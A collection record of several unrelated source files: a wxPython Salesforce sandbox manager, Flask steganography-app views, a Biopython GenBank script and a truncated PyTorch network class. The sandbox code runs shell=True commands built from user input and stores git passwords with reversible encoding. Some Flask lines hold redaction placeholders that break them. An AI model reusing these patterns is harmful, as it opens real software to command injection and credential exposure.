spanV = 0
spanH = 18
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationComboBox,
pos=(row, col + 1),
span=(spanV, spanH - 1),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.sandboxesLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
row += 1
self.mainSizer.Add(
self.sandboxesListBox,
pos=(row, col),
span=(spanV + 10, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 10
self.mainSizer.Add(self.btnOpenSandbox, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.btnDeleteSandbox, pos=(row, col + spanH - 1), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.AddGrowableRow(row - 1)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def OrganizationSelected(self, event):
orgName = self.organizationComboBox.GetValue()
if orgName in dtkglobal.orgDict:
sandboxList = dtkglobal.orgDict[orgName]["sandboxes"]
sandboxList.sort()
self.sandboxesListBox.Items = sandboxList
def OpenSandboxButton(self, event):
orgName = self.organizationComboBox.GetValue()
if len(orgName) == 0:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.sandboxesListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select a sandbox.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.sandboxesListBox.GetString(self.sandboxesListBox.GetSelection())
sandboxName = orgName + "_" + sdbxName
thread = threading.Thread(target=self.RunOpenSandbox, args=(sandboxName,))
thread.setDaemon(True)
thread.start()
def RunOpenSandbox(self, sandboxName):
cmd = ["sfdx", "force:org:open", "-u", sandboxName]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:org:open" + " " + "-u" + " " + sandboxName]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
directory = os.path.join(os.path.expanduser("~"), ".dtk", "log")
if not os.path.exists(directory):
os.makedirs(directory)
outputFileUrl = os.path.join(directory, "output.log")
outputFile = open(outputFileUrl, "wb")
outputFile.write(proc.stdout.read())
outputFile.close()
fileOutput = open(outputFileUrl, "r", encoding="utf8")
for line in fileOutput:
if "ERROR" in line:
dlg = wx.MessageDialog(self, line + "\nPlease remove the sandbox and register it again.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
break
def DeleteSandboxButton(self, event):
orgName = self.organizationComboBox.GetValue()
if len(orgName) == 0:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.sandboxesListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select a sandbox.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.sandboxesListBox.GetString(self.sandboxesListBox.GetSelection())
sandboxName = orgName + "_" + sdbxName
dlg = wx.MessageDialog(
self,
"The sandbox '"
+ sdbxName
+ "' from organization '"
+ orgName
+ "' will be removed from DTK. Please confirm.",
"DTK - Delete Sandbox",
wx.YES_NO | wx.ICON_WARNING,
)
result = dlg.ShowModal()
if result == wx.ID_YES:
thread = threading.Thread(target=self.RunDeleteSandbox, args=(orgName, sdbxName, sandboxName))
thread.setDaemon(True)
thread.start()
dlg.Destroy()
def RunDeleteSandbox(self, orgName, sdbxName, sandboxName):
cmd = ["sfdx", "force:alias:set", sandboxName + "="]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:alias:set" + " " + sandboxName + "="]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
directory = os.path.join(os.path.expanduser("~"), ".dtk", "log")
if not os.path.exists(directory):
os.makedirs(directory)
outputFileUrl = os.path.join(directory, "output.log")
outputFile = open(outputFileUrl, "wb")
outputFile.write(proc.stdout.read())
outputFile.close()
dtkglobal.orgDict[orgName]["sandboxes"].remove(sdbxName)
dtkglobal.StoreOrgs()
dtkglobal.ReadOrgs()
sandboxList = dtkglobal.orgDict[orgName]["sandboxes"]
sandboxList.sort()
self.sandboxesListBox.Items = sandboxList
self.Layout()
class ManageOrganizationPanel(wx.Panel):
def __init__(self, parent):
super(ManageOrganizationPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(5, 5)
self.organizationLbl = wx.StaticText(self, label="Organizations")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationListBox = wx.ListBox(self)
self.organizationListBox.ToolTip = "List of Organizations available."
self.organizationListBox.Items = dtkglobal.orgList
self.organizationListBox.Bind(wx.EVT_LISTBOX, self.SelectOrganization)
self.gitUrlLbl = wx.StaticText(self, label="Git URL")
self.gitUrlLbl.ToolTip = "Git URL linked with the Organization."
self.gitUrlTextCtrl = wx.TextCtrl(self)
self.gitUrlTextCtrl.ToolTip = "Git URL linked with the Organization."
self.gitUserLbl = wx.StaticText(self, label="Git Username")
self.gitUserLbl.ToolTip = "Git Username."
self.gitUserTextCtrl = wx.TextCtrl(self)
self.gitUserTextCtrl.ToolTip = "Git Username."
self.gitPassLbl = wx.StaticText(self, label="Git Password")
self.gitPassLbl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.gitPassTextCtrl = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.gitPassTextCtrl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.metadataFolderLbl = wx.StaticText(self, label="Metadata Folder")
self.metadataFolderLbl.ToolTip = "Metadata Folder."
self.metadataFolderTextCtrl = wx.TextCtrl(self)
self.metadataFolderTextCtrl.ToolTip = "Metadata Folder."
self.preScriptFolderLbl = wx.StaticText(self, label="Pre-deploy Script")
self.preScriptFolderLbl.ToolTip = "Pre-deploy Script Folder."
self.preScriptFolderTextCtrl = wx.TextCtrl(self)
self.preScriptFolderTextCtrl.ToolTip = "Pre-deploy Script Folder."
self.scriptFolderLbl = wx.StaticText(self, label="Post-deploy Script")
self.scriptFolderLbl.ToolTip = "Post-deploy Script Folder."
self.scriptFolderTextCtrl = wx.TextCtrl(self)
self.scriptFolderTextCtrl.ToolTip = "Post-deploy Script Folder."
self.btnUpdate = wx.Button(self, label="Update")
self.btnUpdate.Bind(wx.EVT_BUTTON, self.UpdateButton)
self.btnDelete = wx.Button(self, label="Delete")
self.btnDelete.Bind(wx.EVT_BUTTON, self.DeleteButton)
row = 0
col = 0
spanV = 0
spanH = 18
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationListBox,
pos=(row, col + 1),
span=(spanV + 10, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 10
self.mainSizer.Add(self.gitUrlLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUrlTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitUserLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUserTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitPassLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitPassTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(
self.metadataFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.Add(
self.metadataFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.preScriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.preScriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.scriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.scriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.btnUpdate, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.btnDelete, pos=(row, col + spanH), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def SelectOrganization(self, event):
sdbxName = self.organizationListBox.GetString(self.organizationListBox.GetSelection())
self.gitUrlTextCtrl.Clear()
self.gitUserTextCtrl.Clear()
self.gitPassTextCtrl.Clear()
self.metadataFolderTextCtrl.Clear()
self.preScriptFolderTextCtrl.Clear()
self.scriptFolderTextCtrl.Clear()
if sdbxName in dtkglobal.orgDict:
if len(dtkglobal.orgDict[sdbxName]["giturl"]) > 0:
self.gitUrlTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["giturl"])
if len(dtkglobal.orgDict[sdbxName]["gituser"]) > 0:
self.gitUserTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["gituser"])
if len(dtkglobal.orgDict[sdbxName]["gitpass"]) > 0:
gitpassDecoded = dtkglobal.Decode(
dtkglobal.orgDict[sdbxName]["gituser"], dtkglobal.orgDict[sdbxName]["gitpass"]
)
self.gitPassTextCtrl.WriteText(gitpassDecoded)
if len(dtkglobal.orgDict[sdbxName]["metadatafolder"]) > 0:
self.metadataFolderTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["metadatafolder"])
if "preScript" in dtkglobal.orgDict[sdbxName]:
if len(dtkglobal.orgDict[sdbxName]["preScript"]) > 0:
self.preScriptFolderTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["preScript"])
if len(dtkglobal.orgDict[sdbxName]["script"]) > 0:
self.scriptFolderTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["script"])
def UpdateButton(self, event):
if self.organizationListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.organizationListBox.GetString(self.organizationListBox.GetSelection())
if sdbxName in dtkglobal.orgDict:
dtkglobal.orgDict[sdbxName]["giturl"] = self.gitUrlTextCtrl.GetValue()
dtkglobal.orgDict[sdbxName]["gituser"] = self.gitUserTextCtrl.GetValue()
gitpassEncoded = dtkglobal.Encode(self.gitUserTextCtrl.GetValue(), self.gitPassTextCtrl.GetValue())
dtkglobal.orgDict[sdbxName]["gitpass"] = gitpassEncoded
dtkglobal.orgDict[sdbxName]["metadatafolder"] = self.metadataFolderTextCtrl.GetValue()
dtkglobal.orgDict[sdbxName]["preScript"] = self.preScriptFolderTextCtrl.GetValue()
dtkglobal.orgDict[sdbxName]["script"] = self.scriptFolderTextCtrl.GetValue()
dtkglobal.StoreOrgs()
dlg = wx.MessageDialog(
self,
"The organization '" + sdbxName + "' has been updated.",
"DTK - Update Organization",
wx.OK | wx.ICON_INFORMATION,
)
dlg.ShowModal()
dlg.Destroy()
def DeleteButton(self, event):
if self.organizationListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.organizationListBox.GetString(self.organizationListBox.GetSelection())
if sdbxName in dtkglobal.orgDict:
if len(dtkglobal.orgDict[sdbxName]["sandboxes"]) > 0:
dlg = wx.MessageDialog(
self,
"The organization '"
+ sdbxName
+ "' can't be deleted, please remove first the sandboxes linked to this organization.",
"DTK - Delete Organization",
wx.OK | wx.ICON_ERROR,
)
dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(
self,
"The organization '" + sdbxName + "' will be deleted from DTK. Please confirm.",
"DTK - Delete Organization",
wx.YES_NO | wx.ICON_WARNING,
)
result = dlg.ShowModal()
if result == wx.ID_YES:
dtkglobal.orgDict.pop(sdbxName)
dtkglobal.StoreOrgs()
dtkglobal.ReadOrgs()
self.Parent.GetPage(0).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(1).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(2).organizationListBox.Items = dtkglobal.orgList
self.Layout()
dlg.Destroy()
class AddOrganizationPanel(wx.Panel):
def __init__(self, parent):
super(AddOrganizationPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(5, 5)
self.organizationLbl = wx.StaticText(self, label="Organization")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationTextCtrl = wx.TextCtrl(self)
self.organizationTextCtrl.ToolTip = "List of Organizations available."
self.gitUrlLbl = wx.StaticText(self, label="Git URL")
self.gitUrlLbl.ToolTip = "Git URL linked with the Organization."
self.gitUrlTextCtrl = wx.TextCtrl(self)
self.gitUrlTextCtrl.ToolTip = "Git URL linked with the Organization."
self.gitUserLbl = wx.StaticText(self, label="Git Username")
self.gitUserLbl.ToolTip = "Git Username."
self.gitUserTextCtrl = wx.TextCtrl(self)
self.gitUserTextCtrl.ToolTip = "Git Username."
self.gitPassLbl = wx.StaticText(self, label="Git Password")
self.gitPassLbl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.gitPassTextCtrl = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.gitPassTextCtrl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.metadataFolderLbl = wx.StaticText(self, label="Metadata Folder")
self.metadataFolderLbl.ToolTip = "Metadata Folder."
self.metadataFolderTextCtrl = wx.TextCtrl(self)
self.metadataFolderTextCtrl.ToolTip = "Metadata Folder."
self.metadataFolderTextCtrl.AppendText(dtkglobal.defaultMetadataFolder)
self.preScriptFolderLbl = wx.StaticText(self, label="Pre-deploy Script")
self.preScriptFolderLbl.ToolTip = "Pre-deploy Script Folder."
self.preScriptFolderTextCtrl = wx.TextCtrl(self)
self.preScriptFolderTextCtrl.ToolTip = "Pre-deploy Script Folder."
self.preScriptFolderTextCtrl.AppendText(dtkglobal.defaultPreScriptFolder)
self.scriptFolderLbl = wx.StaticText(self, label="Post-deploy Script")
self.scriptFolderLbl.ToolTip = "Post-deploy Script Folder."
self.scriptFolderTextCtrl = wx.TextCtrl(self)
self.scriptFolderTextCtrl.ToolTip = "Post-deploy Script Folder."
self.scriptFolderTextCtrl.AppendText(dtkglobal.defaultScriptFolder)
self.btnAddOrganization = wx.Button(self, label="Add Organization")
self.btnAddOrganization.Bind(wx.EVT_BUTTON, self.AddOrganizationButton)
self.consoleOutputLbl = wx.StaticText(self, label="Log")
self.consoleOutputLbl.ToolTip = "Console output log."
self.consoleOutputTextCtrl = wx.TextCtrl(
self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_AUTO_URL | wx.HSCROLL
)
self.consoleOutputTextCtrl.ToolTip = "Console output log."
row = 0
col = 0
spanV = 0
spanH = 19
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitUrlLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUrlTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitUserLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUserTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitPassLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitPassTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(
self.metadataFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.Add(
self.metadataFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.preScriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.preScriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.scriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.scriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(
self.btnAddOrganization, pos=(row, col + spanH), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputTextCtrl,
pos=(row, col),
span=(spanV + 9, spanH + 2),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.AddGrowableRow(row)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def AddOrganizationButton(self, event):
sdbxName = self.organizationTextCtrl.GetLineText(0)
sdbxName = sdbxName.rstrip()
sdbxName = sdbxName.replace(" ", "_")
if len(sdbxName) == 0:
dlg = wx.MessageDialog(
self, "Please select an organization name.", "DTK - Organizations", wx.OK | wx.ICON_ERROR
)
dlg.ShowModal()
dlg.Destroy()
return
giturl = self.gitUrlTextCtrl.GetLineText(0)
gituser = self.gitUserTextCtrl.GetLineText(0)
gitpass = self.gitPassTextCtrl.GetLineText(0)
metadatafolder = self.metadataFolderTextCtrl.GetLineText(0)
preScript = self.preScriptFolderTextCtrl.GetLineText(0)
script = self.scriptFolderTextCtrl.GetLineText(0)
gitpassEncoded = dtkglobal.Encode(gituser, gitpass)
if sdbxName in dtkglobal.orgDict:
dlg = wx.MessageDialog(
self,
"The organization '" + sdbxName + "' already exist, please choose another name",
"DTK - Add Organization.",
wx.OK | wx.ICON_ERROR,
)
dlg.ShowModal()
dlg.Destroy()
else:
sdbxConf = {}
sdbxConf["sandboxes"] = []
sdbxConf["giturl"] = giturl
sdbxConf["gituser"] = gituser
sdbxConf["gitpass"] = gitpassEncoded
sdbxConf["metadatafolder"] = metadatafolder
sdbxConf["preScript"] = preScript
sdbxConf["script"] = script
dtkglobal.orgDict[sdbxName] = sdbxConf
dtkglobal.StoreOrgs()
self.consoleOutputTextCtrl.AppendText("Organization added with name: " + sdbxName)
self.consoleOutputTextCtrl.AppendText(os.linesep)
dtkglobal.ReadOrgs()
self.Parent.GetPage(0).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(1).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(2).organizationListBox.Items = dtkglobal.orgList
class ManageOrgsFrame(wx.Frame):
def __init__(self, parent=None):
super(ManageOrgsFrame, self).__init__(parent, title="Organizations")
myStream = dtkglobal.getImageStream()
myImage = wx.Image(myStream)
myBitmap = wx.Bitmap(myImage)
icon = wx.Icon()
icon.CopyFromBitmap(myBitmap)
self.SetIcon(icon)
# dtkglobal.MakeModal(self, True)
self.InitUI()
def InitUI(self):
self.panel = wx.Panel(self)
self.nb = wx.Notebook(self.panel)
self.nb.AddPage(ManageSandboxPanel(self.nb), "Manage Sandboxes")
self.nb.AddPage(AddSandboxPanel(self.nb), "Add Sandbox")
self.nb.AddPage(ManageOrganizationPanel(self.nb), "Manage Organizations")
self.nb.AddPage(AddOrganizationPanel(self.nb), "Add Organization")
self.mainSizer = wx.GridBagSizer(5, 5)
row = 0
col = 0
spanV = 0
spanH = 2
self.mainSizer.Add(self.nb, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.AddGrowableCol(0)
self.mainSizer.AddGrowableRow(0)
self.panel.SetSizerAndFit(self.mainSizer)
self.mainSizer.Fit(self)
self.Layout()
self.Centre()
self.MinSize = self.Size
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.Show()
def OnCloseWindow(self, event):
self.Destroy()
```
|
{
"source": "jesus1554/FotoCrytpo",
"score": 2
}
|
#### File: jesus1554/FotoCrytpo/views.py
```python
from flask import Flask, request, session, render_template, flash, redirect, url_for, send_file
from werkzeug.security import generate_password_hash, check_password_hash
from flask_sqlalchemy import SQLAlchemy
from cryptosteganography import CryptoSteganography
from double_auth import send_verfication
from random import randint
from app import *
import os
allowedFiles = ['jpg', 'png', 'jpeg']
def deletePrevious():
import glob
files = glob.glob('./upload/*')
for fl in files:
os.remove(fl)
def indexView():
if "username" in session:
return render_template('home.html', username=session['username'])
return render_template('index.html')
def encryptView():
if request.method == 'POST':
deletePrevious()
f = request.files['image']
filename = f.filename
extentionFile = filename.split('.')
imgPath = f'./upload/{filename}'
password = request.form['password']
message = request.form['message']
outputName = f"./upload/{extentionFile[0]}-encr.png"
simpleOutput = f'{extentionFile[0]}-encr.png'
if extentionFile[1] in allowedFiles:
f.save(imgPath)
else:
flash('Extensión de archivo no permitida', 'danger')
return redirect(url_for('index'))
# Encrypting File
crypto_steganography = CryptoSteganography(password)
crypto_steganography.hide(imgPath, outputName, message)
flash('Se guardó correctamente', 'success')
return render_template('encrypt.html', outfile=simpleOutput)
return render_template('encrypt.html')
def decryptView():
pass
def loginView():
if request.method == "POST":
user = User.query.filter_by(
email=request.form["email"]
).first()
if user and check_password_hash(user.password, request.form["password"]):
session["username"] = user.username
return redirect(url_for('index'))
flash('Tus credenciales son inválidas, inténtalo de nuevo', 'danger')
return render_template('login.html')
def signupView():
global pin
global newUser
if request.method == "POST":
if int(request.form['code']) > 0:
usrcode = int(request.form['code'])
if pin == usrcode:
confirmedUser = User(
username = newUser['username'],
email = newUser['email'],
password = <PASSWORD>['password']
)
db.session.add(confirmedUser)
db.session.commit()
pin = randint(1000, 9999)
newUser = None
return redirect(url_for('login'))
else:
flash('Incorrecto :(', 'danger')
return render_template('confirm.html')
else:
hashed_pw = generate_password_hash(request.form["password"], method="sha256")
newUser = {
'username': request.form["username"],
'email': request.form["email"],
'password': <PASSWORD>
}
send_verfication(pin, newUser['email'])
flash("¡Te has registrado exitosamente!", "success")
return render_template('confirm.html', mail=newUser['email'])
return render_template('signup.html')
```
|
{
"source": "JESUS-2120/Python_2",
"score": 3
}
|
#### File: Python_2/Tareas/Secuencias_y_Formatos.py
```python
from Bio.Seq import Seq
from Bio import SeqIO
#Definimos la funcion que recibira como argumentos la ruta del archivo y la lista con nombres de genes
def resumen(path,genes):
#Damos lectura al archivo e imprimimos los datos que nos interesa conocer
for register in SeqIO.parse(path,"genbank"):
organismo = register.annotations["organism"]
version = register.annotations["sequence_version"]
source = register.features[0]
print(f"Organismo = {organismo}")
print(f"Version = {version}")
print("Fuente de aislamiento ",source.qualifiers["isolation_source"])
print("Pais",source.qualifiers["country"])
'''Creamos una estructura con dos for anidados que nos permitira recorrer el
archivo genbank en busca de las secuencias de los genes cuyos nombres
se encuentran en la lista para posteriormente imprimirlas'''
for j in range(0, len(genes)):
gen = "['"+genes[j]+"']"
for i in range(2, len(register.features) , 2):
if (str(gen) == str(register.features[i].qualifiers["gene"]) ):
start = register.features[i].location.nofuzzy_start
end = int(start) + 15
sec = register.seq[start:end]
print(f"Gene = {genes[j]}")
print(f"DNA = {sec}")
print(f"RNA = {sec.transcribe()}")
print(f"PROTEINA = {sec.translate()}")
gen = ""
#Se introduce de manera amable al usuario
print("Bienvenido a Secuencias y Formatos :D\n")
desicion = input("Desea usar el archivo genbank por default? [S/N]: ")
#Se pregunta al usuario si desea ingresar su propio archivo genbank y se guarda el path
if desicion == "S":
path = "../files/virus.gb"
else:
path = str(input("Introduzca la ruta de su arcivo genbank: "))
#Se pide al usuario que ingrese los nombres en la lista
print("Intoduzca su lista de nombres de genes")
c = int(input("Ingrese cuantos nombres hay en su lista: "))
i = 0
Gen = []
while i < c:
i += 1
print("Ingrese el nombre: ")
nombre_user = input().upper()
Gen.append(nombre_user)
resumen(path,Gen)
```
|
{
"source": "jesus-333/Dynamic-PyTorch-Net",
"score": 3
}
|
#### File: Dynamic-PyTorch-Net/Old file/DynamicNet_OLD.py
```python
import torch
from torch import nn
from support_DynamicNet import getActivationList, getPoolingList, convOutputShape
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
class DynamicCNN(nn.Module):
def __init__(self, parameters, print_var = False, tracking_input_dimension = False):
super().__init__()
self.print_var = print_var
self.tracking_input_dimension = tracking_input_dimension
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Parameters recovery and check
# Set device for the training/execution
if("device" in parameters.keys()): self.device = parameters["device"]
else: self.device = device = torch.device("cpu")
# Set the number of layers for convolutional part
if("layers_cnn" in parameters.keys()):
layers_cnn = int(parameters["layers_cnn"]) #0
if(print_var): print("Layer CNN: {}".format(layers_cnn))
else:
layers_cnn = 0;
if(print_var): print("Layer CNN: {}".format(layers_cnn))
# raise Exception("No \"layers_cnn\" key inside the paramters dictionary")
# Set the number of layers for linear part
if("layers_ff" in parameters.keys()):
layers_ff = int(parameters["layers_ff"]) #1
if(print_var): print("Layer Linear: {}".format(layers_ff))
else:
layers_ff = 0
if(print_var): print("Layer Linear: {}".format(layers_ff))
# raise Exception("No \"layers_ff\" key inside the paramters dictionary")
if(layers_cnn == 0 and layers_ff == 0): raise Exception("Both \"layers_cnn\" and \"layers_ff\" are set to 0. You must have at least one layer.")
self.layers_cnn, self.layers_ff = layers_cnn, layers_ff
# Set activation functions for each layer
act = getActivationList()
if("activation_list" in parameters.keys()):
activation_list = parameters["activation_list"]
# Check activation list length (N.B the +1 is added because there is the flatten layer between the cnn and the feed-forward part)
if(len(activation_list) != layers_cnn + layers_ff + 1): raise Exception("wrong number of elements in activation_list")
# Create the activation list of the two part of the network
activation_list_cnn = activation_list[0:layers_cnn]
activation_list_ff = activation_list[(layers_cnn + 1):]
activation_flatten = activation_list[layers_cnn]
if(print_var): print("Activation CNN: {}\nActivation Linear: {}\nActivation Flatten: {}".format(activation_list_cnn, activation_list_ff, activation_flatten))
else:
raise Exception("No \"activation_list\" key inside the paramters dictionary")
if(layers_cnn != 0):
# Set kernel list
if("kernel_list" in parameters.keys() and layers_cnn != 0):
kernel_list = convertTupleElementToInt(parameters["kernel_list"])
# Check kernel list length
if(len(kernel_list) != layers_cnn): raise Exception("Wrong number of elements in kernel_list")
if(print_var): print("Kernels: {}".format(kernel_list))
else:
if(print_var): print("Kernels: {}".format(kernel_list))
# raise Exception("No \"kernel_list\" key inside the paramters dictionary")
# Set filter list
if("filters_list" in parameters.keys() and layers_cnn != 0):
filters_list = convertTupleElementToInt(parameters["filters_list"])
# Check filter list length
if(len(filters_list) != layers_cnn): raise Exception("Wrong number of elements in filters_list")
if(print_var): print("Filters/Channels: {}".format(filters_list))
else:
raise Exception("No \"filters_list\" key inside the paramters dictionary")
# Set stride list
if("stride_list" in parameters.keys() and layers_cnn != 0):
stride_list = convertTupleElementToInt(parameters["stride_list"])
# Check stride list length
if(len(stride_list) != layers_cnn): raise Exception("Wrong number of elements in stride_list")
if(print_var): print("Stride List: {}".format(stride_list))
else:
